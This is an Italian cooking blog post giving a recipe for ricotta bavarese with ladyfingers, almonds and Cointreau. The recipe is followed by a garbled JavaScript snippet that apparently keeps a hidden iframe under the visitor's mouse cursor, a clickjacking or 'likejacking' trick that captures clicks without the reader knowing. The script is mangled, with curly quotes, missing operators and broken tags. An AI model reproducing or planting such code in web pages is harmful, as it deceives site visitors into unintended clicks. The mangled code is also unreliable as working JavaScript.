giovedì 17 ottobre 2013

Bavarese alla ricotta

INGREDIENTI PER 12 PERSONE:600 gr di panna da montare,500 gr di ricotta,200 gr di zucchero a velo,80 gr di mandorle sbucciate,12 savoiardi,6 fogli di gelatina,4 tuorli,Cointreau PREPARAZIONE:Scaldate 50 gr di panna e mettete a sciogliervi la gelatina.Montate i tuorli con lo zucchero.Tostate meta' delle mandorle e tritatele grossolanamente.Passate la ricotta al setaccio ,quindi incorporatevi le mandorle,le uova,e la gelatinasciolta nella panna.Montate il resto della panna e unitela delicatamente al composto ,tenendone una parte per le decorazioni.Aromatizzate con un bicchierino di liquore.Versate il composto in uno stampo a mattonella,livellatelo e mettete nel frigo per almeno 3 ore.Sformate poi in un piatto adatto la bavarese e tagliate i savoiardi a meta',inzzuppateli velocemente nel liquore allungato con un po' di acqua e disponeteli intorno alla torta.Guarnite con ciuffetti di panna montata e lamelle di mandorle.
text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>